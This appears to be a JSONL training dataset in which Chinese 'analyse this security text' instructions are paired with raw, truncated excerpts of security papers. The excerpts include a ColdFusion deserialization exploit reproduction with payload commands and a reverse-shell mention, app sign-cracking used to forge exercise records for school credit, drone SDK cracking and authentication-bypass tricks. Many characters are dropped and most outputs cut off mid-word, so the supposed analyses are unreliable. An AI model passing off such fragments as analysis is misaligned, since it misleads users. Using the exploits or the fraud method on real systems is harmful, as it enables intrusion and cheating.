about ending the relationship with him Why was this case was important?  Intelligence Identities Protection Act  Polygraph use helped break case GHANA 1981 Coup. Power seized by Flight Li", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00前言 本期登场的目标虽不是SRC但是整个漏洞的利用手法很有学习意义目前在很多大厂的http数据包中 都会添加sign值对数据包是否被篡改进行校验而sign算法的破解往往是我们漏洞测试的关键所在~ 本人在一些漏洞挖掘实战中经常发现在破解sign值后在测试各类越权重放等漏洞时一马平川 今天特此为大家带来这样一个精彩的实战案例 0x01 背景 学校每学期的体育成绩中会有10来源于某跑步APP的打卡数据本人作为一个体测只能勉强及格的废 物自然得想办法拿到这10分以防挂科 无奈这个app后台设置的是每学期男生总共要求跑120公里才能完整地拿到10分非常恶心 一学期跑120公里你还不如鲨了我于是便有了此文对于其app的crack 0x02 初步测试 手机装好https证书挂好Burpsuite的代理随后我们直接去抓取该APP上传校园跑步数据时的请求 请求如下 我们发现单次跑步距离对应的POST参数为FormatSportRange自然二话不说对其进行修改将0.000 修改为5.000 此时悲剧发生了直接提示认证失败~ 定神细看发现POST数据末尾有sign签名.... 此时老开发或老安全肯定就知道发生甚么事了为了让本文对新手友好一些下面简单讲一下sign校验 手法 0x03 何为Sign签名校验 Sign签名校验法本质上是对客户端传输数据合法性的一种校验手段 其常用手法为在用户客户端传输的数据中额外加上时间戳以及特殊字符随后一起得出整体数据的加 密值(常用MD5,SHA1等加密算法) 这就导致了用户在不知晓程序的原始数据生成sign值的方法情况下若对传输到服务端的数据进行篡 改在后端都会鉴权失败导致用户篡改后的数据无效 0x04 sign值的安全对抗方法 针对有sign签名值的数据包本人常用的测试手法有两个 1.检测sign值是否为弱凭据 2.检测sign值是否可以置空 第一种类型通常有两种情况 ①看sign值是否采用了一些弱加密/编码方法(例如base64)我们解码后可以直接看到sign的原始数 据 ②测试sign值是否为时间戳/随机数加密后的密文值在一些实战情况中很多厂商安全开发意识不 足会将sign值的算法直接暴露在前端未加密的js中或者直接将用户进行某操作的时间戳进行md5加 密后作为sign凭据导致sign凭据在一段时间内可以通过遍历时间戳进行猜解 第二种类型就比较好理解我们直接将sign参数以及值删掉看后端程序是否可以不校验sign直接执行 我们传输的数据 上述概念可能看起来比较抽象下面我们继续来看本案例 0x05 二次测试 我们先尝试第一种方法上方添加跑步记录获取到的sign值为5ded7f11f080fb5a9d403c9d0963ebaa 拿眼一看大概率sign值是使用md5加密的我们随后对其进行解密 GG了看样厂商的安全意识不算太差~没有使用时间戳或者随机数加密后的值作为sign导致sign可以 被无脑遍历猜解 随后我们尝试第二种方法置空sign值 发现依然鉴权认证失败gg了 看样两种常规的对抗sign的方法已经废了我们只能从app下手了逆向尝试去寻找其sign的算法 0x06 逆向apk文件取得其sign值算法 拿到程序apk直接查壳运气不错apk没加壳省了不少功夫 直接将apk文件拖到jadx中对其进行逆向分析 全局搜素sign在仔细挨个查看后成功定位到了其sign生成的关键算法 代码过长关键部分代码如下 可以看到其sign值的签名算法为 创建一个链表, 将全部已有的参数加入进去, 然后再加上一些键值对(其中timestamp时间戳我们已知 appIDappSecret两个键值对我们均未知) 之后再将全部的键值对根据键的字母顺序进行排序, 之后使用 querystring 方式对键值对进行编码. 最后再对编码后的字符串求 MD5 值, 就是最终的签名了, 麻烦的一比 0x07 继续逆向apk文件获取未知键值对 我们继续来找appIDappSecret两个我们未知的键值对 发现其获取方法如下 ①appID键值对的获取方法: 如果请求的url是 https://m.xxxxx.com 则为move否则调用getAppId方法 后面我搜索了一下getAppId方法发现其本质上是获取某接口openId的参数值随后赋值给AppID 我去burpsuite走了一遍这个apk的业务然后去http history搜索了一下openId,直接获取到了我们学校 的openId参数值也就是说我们获取到了AppID ②appSceret键值对获取方法 在jadx中提示appSecre键t对应的值来源于g.b我们在import的包中成功找到了g.b即appSecret 0x08 Nodejs编写计算sign的Exploit sign", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDrones Hijacking Aaron Luo Cyber Safety Solution multi-dimensional attack vectors and countermeasures Agenda  Introduce the drone architecture  Vulnerabilities on which component?  Demo  Provide the prevention solution  Release attack/defense tools on GitHub. Today, our target is DJI-Phantom 3 Advanced DJI Phantom 3A Architecture  Drone  Flight controller 2.4GHz radio module GPS module Sensors (compass, Gyroscope, Accelerometer, Barometeretc.) Micro-USB Slug (flight simulating program need this to connect) MicroSD Slug (firmware updated usage and photo storage)  Other Parts(battery, screw propeller, camera, gimbals, pilot lamp)  Remote Controller  2.4GHz radio module  USB Slug (I/O function with phones App)  Micro-USB Slug (firmware update usage)  Other Parts (Joystick, button, lights)  App/SDK  Connect to Remote Control, display drone information (like image of camera, GPS data and Compass)  Operator Drone (drone takeoff, Automatic return) DJI Phantom 3A Architecture  Drone  Flight controller 2.4GHz radio module GPS module Sensors (compass, Gyroscope, Accelerometer, Barometeretc.) Micro-USB Slug (flight simulating program need this to connect) MicroSD Slug (firmware updated usage and photo storage)  Other Parts(battery, screw propeller, camera, gimbals, pilot lamp)  Remote Controller  2.4GHz radio module  USB Slug (I/O function with phones App)  Micro-USB Slug (firmware update usage)  Other Parts (Joystick, button, lights)  App/SDK  Connect to Remote Control, display drone information (like image of camera, GPS data and Compass)  Operator Drone (drone takeoff, Automatic return) DJI App/SDK Flow Chart Crack the SDK Authentication Mechanism  Download SDK from DJI website  Find key function with JD-GUI Crack the SDK Authentication Mechanism  Use JBE - Java Bytecode Editor to patch the code Crack the SDK Authentication Mechanism  Check the result with JD-GUI DEMO Connect to Drone by Cracked SDK DEMO Take off/Landing DEMO Fly to specified location How to prevent/improve", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从软件开发角度解密OWASP TOP 10 应用安全与安全的开发 OWASP TOP 10浅 析 安全开发演化 安全开发现状 企业所面临的安全挑战 S-SDLC落地实现 研发视角解决 OWASP TOP 10 日程 OWASP TOP 10 select id, uname, passwd from users where uname= $un$' and passwd=$pw$' SQL Injection XSS 业务逻辑 第三方插件 OWASP TOP 10攻击思 路 安全与我有关系 吗 功能与安全距离 有多远 安全漏洞在哪里 安全离我有多远 OWASP TOP 10浅 析 安全开发演化 安全开发现状 企业所面临的安全挑战 S-SDLC落地实现 研发视角解决 OWASP TOP 10 日程 OWASP TOP 10浅 析 安全开发演化 安全开发现状 企业所面临的安全挑战 S-SDLC落地实现 研发视角解决 OWASP TOP 10 日程 安全开发现状 0 50 100 设计 实现 确认 运维 修复缺陷的相对成本 1 6.5 15 100 IBM System Science Institute 事件响应 渗透测试 架构审核 需求 设计 实现 确认 部署运维 OWASP TOP 10浅 析 安全开发演化 安全开发现状 企业所面临的安全挑战 S-SDLC落地实现 研发视角解决 OWASP TOP 10 日程 有安全问题当然要解决问题是 1. 请问题一次性告诉我我好统筹解决 2. 谁能告诉我们如何解决才是最正确的 我经常遇到解决的问题被打回重新解决 3. 我要保证产品交付我不想做没有证据 证明确实有安全问题的情况下来解决那些 不明确的问题 企业面临的安全挑战-研发团队 企业面临的安全挑战-安全团队 绝大多数安全问题是由研发团队写代码写出来 的我们需要制订各种规范让所有的人遵守 Java安全开发规范 CC++安全开发规范 Struts安全开发规范 Spring安全开发规范 Web安全开发规范 Desktop Software安全开发规范 Server Side Software安全开发规范 敏感信息保护策略 加密算法安全使用指南  最近 业界安全事件频发我们公司全线产品的安全状态是什 么CTO/ CSO明天给我一份安全现状评估报告给我 高层领导 #1 你们不是全程跟踪安全相关的事务的吗 怎么会没有数据 CTO #3 老大这些信息得从研发团队搜 集否则很难得到反应真实状况的 数据  #2 CSO 企业面临的安全挑战- CSO/CTO/Highlevel 企业面临的安全挑战-开发流程 企业面临的安全挑战-工具的利与弊 OWASP TOP 10浅 析 安全开发演化 安全开发现状 企业所面临的安全挑战 S-SDLC落地实现 研发视角解决 OWASP TOP 10 日程 初识S-SDLC 安全开发过程 基于安全功能的单元 测试 安全测试 渗透测试 渗透测试 部署\\运维 测试 开发 设计 需求 识别安全需求 导出安全需求 融入安全设计 导出安全开发 实现安全设计 导出测试用例 执行安全测试 安全测试 渗透测试 红队渗透应急响应 部署\\运维 测试 开发 设计 需求 传统的 安全开发过程 S-SDLC 治理风险合规 培训 团队 流程 工具  人员组织  角色责任  安全活动  安全要求  输入输出  开发支持  测试工具  管理工具 S-SDLC流程关键要素 实践 1企业必须自上而下推行S-SDLC实施且有相应的组织结构支撑 2S-SDLC要与企业的质量管理体系相结合 3建立合适的人员培训体系 4用度量体系将S-SDLC实施效果可视化 5产品的安全目标决定S-SDLC的过程 6威胁模型可以使产品避免大的设计风险 7安全特性组件化可尽量避免编码漏洞 8管理第三方软件的风险 9安全服务化和自动化是实施DevSecOps的基础 10S-SDLC工具链 OWASP TOP 10浅 析 安全开发演化 安全开发现状 企业所面临的安全挑战 S-SDLC落地实现 研发视角解决 OWASP TOP 10 日程 设 计 确 认 实 现 部 署 运 维 需 求 OWASP TOP 10解 决 思考-S-SDLC支撑平台 专业性极强的平台技术支撑团队 知识积累和资源管理平台 项目团队安全培训 需求安全评估 安全设计TMT 安全实现IAST 安全部署安全配置 安全运维RASP 需求安全分析报告 安全威胁分析报告 自动人工代码审核报告 渗透安全测试及确认报告 安全部署报告 安全运维报告 S-SDLC 云平台容器 服务 持续集成 报告中心 安全领域全栈专家 威胁分析专家 安全实现技术解决方案专家 渗透安全测试及确认专家 安全配置专家 安全运维专家 AST技术比较 IASTV", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nShifting the Focus of WiFi Security: Beyond cracking your neighbor's wep key Who are we and why do you care?  Thomas Mister_X d'Otreppe de Bouvette Founder of Aircrack-ng  Rick Zero_Chaos Farina Aircrack-ng Team Member Embedded Development FD: Also works for a WIPS Vendor DISCLAIMER: Some of the topics in this presentation may be used to break the law in new and exciting ways of course we do not recommend breaking the law and it is your responsibility to check your local laws and abide by them. DO NOT blame us when a three letter organization knocks on your door. History of WEP Attacks / Why it doesnt work  Passively Sniff for a long time Slow, not enough data, impatient No more weak ivs  Replay/Injection Attacks Fast but very noisy Simple signatures AP features that try to block (PSPF) History of WPA Attacks / Why it doesnt work  Pre-shared key Requires catching both sides of a quick handshake Must be in range of client and AP  Enterprise Nearly impossible to crack passively Most EAP types are difficult (at best) to MiTM The Well Guarded Door  Nearly 100% of attacks focus on the AP  APs are getting more and more secure  New features built into AP PSPF / Client Isolation Strong Authentication / Encryption Lightweight controller based architecture  APs are no longer the unguarded back door Well deployed with for thought for security Well developed industry best practices Take the Path of Least Resistance Attack the Clients!  Tools have slowly appeared recently  Difficult to use  Odd requirements to make function Attacking Client WEP Key  Wep0ff  Caffe-Latte  Caffe-Latte Frag Attacking Client WPA Key  WPA-PSK No public implementation  WPA-ENT Freeradius-wpe (thanks Brad and Josh!) Requires hardware AP Attacking the Client  Many Separate Tools  Difficult to configure  Typically sparsely documented  Odd requirements and configurations Until now Introducing Airbase-ng  Merges many tools into one  New and improved, simplified implementations  Full monitor mode AP simulati", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Adobe ColdFusion 反序列化漏洞CVE-2017-3066 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品其运行的CFMLColdFusion Markup Language是针对Web应用的一种程序设计语言 Adobe ColdFusion中存在java反序列化漏洞攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务以下版本受到影响Adobe ColdFusion (2016 release) Update 3及之前的版本ColdFusion 11 Update 11及之前的版本ColdFusion 10 Update 22及之前的版本 参考链接 - https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html - https://www.exploit-db.com/exploits/43993 - https://github.com/codewhitesec/ColdFusionPwn ## 漏洞环境 启动漏洞环境 ``` docker compose up -d ``` 等待数分钟时间环境启动成功访问`http://your-ip:8500/CFIDE/administrator/index.cfm`输入密码`vulhub`即可成功安装Adobe ColdFusion ## 漏洞复现 我们使用参考链接中的[ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn)工具来生成POC ``` java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser ``` POC生成于poc.ser文件中将POC作为数据包body发送给`http://your-ip:8500/flex2gateway/amf`Content-Type为application/x-amf ``` POST /flex2gateway/amf HTTP/1.1 Host: your-ip:8500 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-amf Content-Length: 2853 [...poc...] ``` ![](1.png) 进入容器中发现`/tmp/success`已成功创建 ![](2.png) 将POC改成[反弹命令](http://www.jackson-t.ca/runtime-exec-payloads.html)成功拿到shell ![](3.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# now you don't Forensics, 200 points ## Description: > We heard that there is something hidden in this picture. Can you find it? ![Red](images/nowYouDont.png) ## Solution: Browsing through the different planes using [StegSolve](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve) reveals the flag hiding in \"Red plane 1\": ![Red](images/nowYouSeeMe.png) [This method](https://www.wikihow.com/Create-Hidden-Watermarks-in-GIMP) works as well, but takes longer. The flag: picoCTF{n0w_y0u_533_m3}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Open Guide To Evaluating Software Composition Analysis Tools By Ibrahim Haddad, PhD. November 2020 www.linuxfoundation.org The Linux Foundation 2 An Open Guide To Evaluating Software Composition Analysis Tools Introduction With the help of software composition analysis (SCA) tools, software development teams can track and analyze any open source code brought into a project from a licensing compliance and security vulnerabilities perspective. Such tools discover open source code (at various levels of details and capabilities), their direct and indirect dependencies, licenses in effect, and the presence of any known security vulnerabilities and potential exploits. Several companies provide SCA suites, open source tools, and related services driven as community projects. The question of what tool is most suitable for a specific usage model and environment always comes up. It is difficult to answer given the lack of a standard method to compare and evaluate such tools. Therefore, our goal with this paper is to recommend a series of comparative metrics when evaluating multiple SCA tools. This paper is a significantly improved version of Chapter 12 from the Open Source Compliance in the Enterprise (2nd Edition) to document and publicize metrics to compare and evaluate SCA tools, collect feedback and drive towards a standardized model of comparison and evaluation. Please note that no size fits all. There are many tools on the market with varying features, maturity levels, deployment models, etc. As you embark on this journey, we highly recommend that you identify the top desired features for your specific environment and requirements, then test and score the tools against those metrics. The Linux Foundation 3 An Open Guide To Evaluating Software Composition Analysis Tools Evaluation Metrics Metric Description (1) KNOWLEDGE BASE  Size of the knowledge base is typically measured as the number of open source projects, and the number of files tracked. This knowledge base st", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMcAfee 消灭Flash彻底消除它 一份关于Flash攻击途径的全面的研究报告 演讲人Haifei Li, Chong Xu 2019 PART 01 目录 CONTENTS PART 02 背景介绍 PART 03 PART 04 01 02 05 04 03 PART 05 Flash在浏览器环 境中的攻击途径 Flash在Microsoft Office中的攻击途径 Flash在PDF 中的攻击途径 总结 演讲者 Haifei Li. 安全领域知名的安全研究员现就职 于迈克菲加拿大研究领域包括但不局 限于微软的生态系统真实攻击的攻击面分 析下一代防御技术的安全研究及实现他的 研究结果经常分享于主要的安全会议 CanSecWest (四次)Black Hat USA 2015 Microsoft Blue Hat 2016, Syscan360 2012 Tencent TenSec 2016Syscan360 Seattle 2017 等他是2017年Pwnie Awards获得者 Chong Xu.美国杜克大学网络及安全技术博士 现任迈克菲高级总监领导入侵防御团队的研 发他致力于入侵及防御技术威胁情报的研 究及在此基础上的创新他的团队进行漏洞分 析恶意程序分析僵尸网络检测及APT检测, 并且将安全内容和创新性检测防护决方案提供 给迈克菲的网络IPS 主机IPS沙箱等产品 及迈克菲全球威胁情报当中 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. PART.01 背景介绍 背景介绍 Ø Adobe Flash - 多媒体软件平台超过十亿台设备 Ø Flash技术的广泛使用 Ø 动画/多媒体互联网内容超过三百万flash内容开发者 Ø 桌面应用程序移动应用程序移动游戏 Ø Apple App Store/Google Play Store有超过两万的移动应用 Ø Facebook排名前二十五的游戏有二十四个使用Flash Ø 中国排名前九的使用flash技术的游戏每月产生超过七千万美元的效益 Ø 浏览器视频播放器 Ø Flash技术的广泛使用所带来的问题 Ø Flash技术跨平台攻击路径多 Ø Flash本身没有安全机制 Ø 用户更新慢四百万台式机用户在新版本发布六个月内升级 Ø Flash  当之无愧的漏洞高发的重灾区 Ø 0-day之王 - 2011年以来使用flash漏洞的 0-day攻击的不完全统计 CVE-2011-0609 CVE-2011-0611 CVE-2011-2110 CVE-2012-0779 CVE-2012-1535 CVE-2012-5054 CVE-2013-0634 CVE-2013-5331 CVE-2014-0497 CVE-2014-0502 CVE-2014-0515 CVE-2014-8439 CVE-2014-9163 CVE-2015-0310 CVE-2015-0311 CVE-2015-0313 CVE-2015-3043 CVE-2015-3113 CVE-2015-5119 CVE-2015-5123 CVE-2015-5122 CVE-2015-7645 CVE-2015-8651 CVE-2016-0984 CVE-2016-1010 CVE-2016-1019 CVE-2016-4117 CVE-2016-4171 CVE-2016-7855 CVE-2016-7892 CVE-2017-11292 CVE-2018-4878 CVE-2018-5002 CVE-2018-15982 Ø Flash exploit是如何被传送的 Ø Flash文件.swf无法直接被打开 Ø Flash是以插件的形式存在并运行在其它宿主应用程序浏览器Microsoft OfficePDF内部 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. PART.02 Flash在浏览器环境中的攻击途径 Flash在浏览器环 境中的攻击途径 Ø 四大主流浏览器上的Flash攻击途径 Ø Google Chrome Ø Microsoft Edge Ø Microsoft Internet Explorer Ø Mozilla Firefox Ø 主流浏览器Flash攻击的缓解及封杀机", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 情报研判 情报研判属于公安或者网安专门用于经济犯罪的情报侦缉手段 ## 情报研判详解 [TODO] <img src=\"https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200213103415.png\" style=\"zoom:50%;\" /> 情报带来更多的是**攻防思路的变化** ## 情报收集平台 举例不同的情报收集平台 ### RedQueen - [链接](https://redqueen.tj-un.com/IntelHome.html;JSESSIONID=6d3fdffb-b493-4b3a-a993-3f48e8e30ce7) - 安全情报并不及时 ### 永安在线 - 原威胁猎人提供黑产对抗与反欺诈服务[链接](https://www.yazx.com/) - 产品本身不免费但提供了一个开源的风控系统[星云](https://github.com/threathunterX/nebula) ### TreatBook - 微步在线[情报社区](https://m.threatbook.cn/) - 提供一个域名监控功能当一个域名发生变化的时候平台会把监控信息发送到指定邮箱在企业中可以监控自身的域名资产排查异样的情况 - 可视化 功能可以看到相关域名等信息 ### 如何收集 - 拿到数据后从一个常见的指标进行分析 - 网络IPURL - 主机文件哈希动态链接库注册表 - 邮件 - 使用开源的威胁情报平台 [TODO] - 自己搭建蜜罐蜜网收集攻击数据IPHashURL等 - 对自己的已有资产进行分析建模", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPresenter Tony Flick Principal, FYRM Associates Over 6 Years in Information Assurance Many DEFCONs / First presentation Agenda What is the smart grid? What makes up the smart grid? Known problems Security initiatives Timeline History repeating Recommendations What is the Smart Grid? Current infrastructure Future infrastructure What Makes up the Smart Grid? Devices Network infrastructure Bi-directional communication Problems Physical security Bi-directional communication introduces attack vectors Same problems as every other type of network Implications Google Maps art Denial-of-Service Electricity theft Security Initiatives The Energy Independence and Security Act of 2007 NIST Interoperability Framework Advanced Metering Infrastructure (AMI) System Security Requirements v1.01 Critical Electric Infrastructure Protection Act (CEIPA) - (HR 2195) Fluffy Using security fluff words to make people feel warm and fuzzy Security integration from the beginning CIA Timeline - Part 1 Examples of Integrating Security from the beginning (2007 - 2009): Energy Independence and Security Act of 2007 NIST Smart Grid Interoperability Framework Initial list of standards for inclusion in version 1.0 released on May 8, 2009. Advanced Metering Infrastructure (AMI) System Security Requirements v1.01 2007 - 2008 Critical Electric Infrastructure Protection Act (CEIPA) - (HR 2195) 2009 Timeline - Part 1I Design and implementation of the smart grid 2002 actually occurred before 2007 Austin - 2002 Salt River Project - 2006 History Repeating PCI DSS Self-policing and SAQs NERC and FERC NERC - Utilities under reporting NERC and FERC - Aurora vulnerability Duck and Cover? Opportunity missed at the beginning, but we can still make good Allow security to mature More stringent security requirements Compliant vs. Secure Tighter regulation Questions? If we run out of time: Ill be here until Sunday evening Email me: tony.flick@fyrmassociates.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCharged by an Elephant An APT Fabricating Evidence to Throw You In Jail Tom Hegel Senior Threat Researcher tomhegel Juan Andres Guerrero-Saade Senior Director of SentinelLabs juanandres_gs Planted Modi Assassination Plot Ltr_1804_to_CC.pdf Planted Domestic Chaos Plans Document Ltr_2_Anand_E.pdf 11 Days Before Search and Seizure Indian State-Nexus Activity Where are they now? Focus on cloud, remote services / mobile. WHERE ARE THEY NOW? Missing Forensic Artifacts When Digital Evidence Goes Wrong Spyware for Intelligence vs Law Enforcement? Importance of Social Institutions Importance of Social Institutions Thank You Tom Hegel Senior Threat Researcher tomhegel Juan Andres Guerrero-Saade Senior Director of SentinelLabs juanandres_gs", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# We have a liftoff! (1/5) Category: Innovation ## Description > Welcome cadets! > > This is the mission's captain speaking, We are thrilled that you have joined us on this important mission to find extraterrestrial life. > > Sit back and enjoy the ride - your spaceship's kitchen is equipped with cookies and coffee. Just remember, don't spill anything on the equipment, we don't want some undesirable incidents in space. > > It seems that one of our satellites that is orbiting the moon has caught up with a signal... > > ``` > https://v0tw7ojr02.execute-api.us-west-2.amazonaws.com/fireitup > id: 0c786488-544c-4d6f-b04a-e093165989da > POST > ``` ## Solution As guided, let's try to perform a POST request to the given URL with the given parameter: ```console (user@kali)-[/media/sf_CTFs/cyberark/We_have_a_liftoff] $ curl --location --request POST 'https://v0tw7ojr02.execute-api.us-west-2.amazonaws.com/fireitup' \\ --header 'Content-Type: application/json' \\ --data-raw '{\"id\": \"0c786488-544c-4d6f-b04a-e093165989da\"}' -s > response (user@kali)-[/media/sf_CTFs/cyberark/We_have_a_liftoff] $ file response response: ASCII text, with very long lines, with no line terminators ``` We got a text file, let's peek into it by printing the first 100 characters: ```console (user@kali)-[/media/sf_CTFs/cyberark/We_have_a_liftoff] $ head -c 100 response iVBORw0KGwoAAAANSUhEUgAADXAAAAWgCAYAAABNcorEAAAEGWlDQ1BrQ0dDb2xvclNwYWNlR2VuZXJpY1JHQgAAOI2NVV1oHFUU ``` Looks like base64. Let's decode it: ```console (user@kali)-[/media/sf_CTFs/cyberark/We_have_a_liftoff] $ base64 -d response > response.bin (user@kali)-[/media/sf_CTFs/cyberark/We_have_a_liftoff] $ file response.bin response.bin: data ``` So `file` doesn't recognize it, let's take a look inside: ```console (user@kali)-[/media/sf_CTFs/cyberark/We_have_a_liftoff] $ cat response.bin | xxd -g 1 | head 00000000: 89 50 4e 47 0d 0a 1b 0a 00 00 00 0d 49 48 44 52 .PNG........IHDR 00000010: 00 00 0d 70 00 00 05 a0 08 06 00 00 00 4d 72 8a ...p........", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n安全认证相关漏洞挖掘 拿到个系统多很多情况下只有个登录如果想进步得到较为危的漏洞只能去寻 找权限校验相关的漏洞再结合后台洞最终得到个较为满意的漏洞 这列出些较为常的安全认证配置  Spring Security  Apache Shiro  服务器本身(TomcatNginxApache401 认证  Tomcat 安全认证(结合web.xml) 需代码实现  JSON Web Token 以上只是简单列出了些笔者过常的安全认证配置组件不同的鉴权组件存在异同的审计思 路 寻找未授权 这是笔者第先会去看的点毕竟如果能直接从未授权的点进就没必要硬刚鉴权逻辑 了 1.些第三组件概率为未授权应 druidwebserviceswagger等内置于程序中的应多被开发者设计为需权限校验接 第三组件本身存在历史漏洞且以jar包的形式内置于应中低版本的情况很常 利druid的未授权获取了管理员session 2.安全认证框架配置中存在的未授权接 出于某种功能需求开发者会讲些功能接配置需权限 web.xml 细查看配置件中各个FilterServletListener 可能有意想不到的收获 spring-mvc.xml 这是以拦截器的式对外开放了未授权请求处理 tomcat 安全配置 配置类 Apache ShiroSpring Security等持以@Configuare注解式配置权限认证只要按照配置 去寻找当然以上框架也持配置件式配置寻找思路样 3.未授权访问接配合ssrf获取localhost本身需鉴权服务 些多服务组件中存在服务之间的相互调服务之间的相互调或许不需要身份校验或者 已经配置了静态的身份凭证或者通过访问者IP是否为127.0.0.1来进鉴权这时我们需要 个SSRF漏洞即可绕过权限验证 很经典的为Apache Module mod_proxy 场景绕过SSRF CVE-2021-4043. 安全认证框架本身存在鉴权漏洞 1.Apache Shiro Shiro相关的权限绕过漏洞我觉得可以归类到下的路径归化的问题上 2.Spring Security 某些配置下存在权限绕过当配置件放了/**/.js 时 3.JWT 存在的安全险  敏感信息泄露  未校验签名  签名算法可被修改为none  签名密钥爆破  修改对称密码算法为对称密码算法  伪造密钥(CVE-2018-0114) jwt测试具https://github.com/ticarpi/jwt_tool 三静态资源访问 静态资源cssjs等件访问往往不需要权限开发者可能讲鉴权逻辑放在Filter当我们在原 有路由基础上添加.js 后缀时即可绕过验证 这可能会有个问题添加了js后缀后是否还能正常匹配到处理类呢在spring应是可以 的默认配置下的spirng configurePathMatch持添加后缀匹配路由如果想开启后缀匹配模 式需要动重写configurePathMatch法 四路径归化问题 1.简单定义 两套组件或应对同个 URI 解析或者说处理的不致导致路径归化问题的产 orange 的 breaking parser logic 在 2018 帽会上的演讲议题后续许多路径归化的安 全问题都是延伸他的 PPT 2.Shiro 权限绕过漏洞 个很经典的路径归化问题导致 权限的绕过如Shiro CVE-2020-1957 针对户访问的资源地址也就是 URI 地址shiro 的解析和 spring 的解析不致shiro 的 Ant 中的*通配符匹配是不能匹配这个 URI 的/test/admin/page/shiro 认为它是个路径 所以绕过了/test/admin/*这个 ACL spring 认为/test/admin/page 和/test/admin/page/ 是样的它们能在 spring中获取到同样的资源 3.CVE-2021-21982 VMware CarbonBlack Workstation 算是个1day了组件本身身份验证通过Spring Security + JWT来实现且存在两套url的处 理组件Envoy 以及 Springboot PSEnvoy 是专为型现代 SOA向服务架构架构设计的 L7 代理和通信总线 通过diff可以定位到漏洞点个本地获取token的接 但是我们通过外直接访问法获取到token 简单了解下组建的基本架构 抓下envoy 与本机服务的通信 rr yyds ./tcpdump -i lo -nn -s0 -w lo1.cap -v envoy 本身起到个请求转发作可以精确匹配到协议 ip 端 url路径等指定很详 细的路由转发规则且可以对请求进转发和修改 url编码即可绕过envoy的转发规则POC如下 总结由于envoy转", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PE --- PE 与 ELF 文件基本相同也是采用了基于段的格式同时 PE 也允许程序员将变量或者函数放在自定义的段中 GCC 中 attribute(section('name')) 扩展属性 PE 文件的前身是 COFF所以分析 PE 文件先来看看 COFF 的文件格式他保存在 WinNT.h 文件中 COFF 的文件格式和 ELF 几乎一样 | Image Header | |-------------------------------------| | SectionTable Image\\_SECTION\\_HEADER | | \\.text | | \\.data | | \\.drectve | | \\.debug$S | | \\.\\.\\. other sections | | Symbol Table | 文件头定义在 WinNT.h 中我们打开来看一下 - https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_file_header ```h typedef struct _IMAGE_FILE_HEADER { WORD Machine; WORD NumberOfSections; DWORD TimeDateStamp; DWORD PointerToSymbolTable; DWORD NumberOfSymbols; WORD SizeOfOptionalHeader; WORD Characteristics; } IMAGE_FILE_HEADER,*PIMAGE_FILE_HEADER; ``` 我们可以看到它这个文件头和 ELF 实际上是一样的也在文件头中定义了段数符号表的位置Optional Header 的大小这个Optional Header 后边就看到了他就是 PE 可执行文件的文件头的部分以及段的属性等 跟在文件头后边的是 COFF 文件的段表结构体名叫 IMAGE_SECTION_HEADER  - https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_section_header ```h typedef struct _IMAGE_SECTION_HEADER { BYTE Name[IMAGE_SIZEOF_SHORT_NAME]; union { DWORD PhysicalAddress; DWORD VirtualSize; } Misc; DWORD VirtualAddress; DWORD SizeOfRawData; DWORD PointerToRawData; DWORD PointerToRelocations; DWORD PointerToLinenumbers; WORD NumberOfRelocations; WORD NumberOfLinenumbers; DWORD Characteristics; } IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER; ``` 属性包括这些和ELF 没差 - 段名 - 物理地址 PhysicalAddress - 虚拟地址 VirtualAddress - 原始数据大小 Sizeof raw data - 段在文件中的位置 File pointer to raw data - 该段的重定位表在文件中的位置 File pointer to relocation table - 该段的行号表在文件中的位置 File pointer to line number - 标志位包括段的类型对齐方式读取权限等标志 --- ## DOS 头 在我们分析 PE 的之前还有另外一个头要了解一下DOS 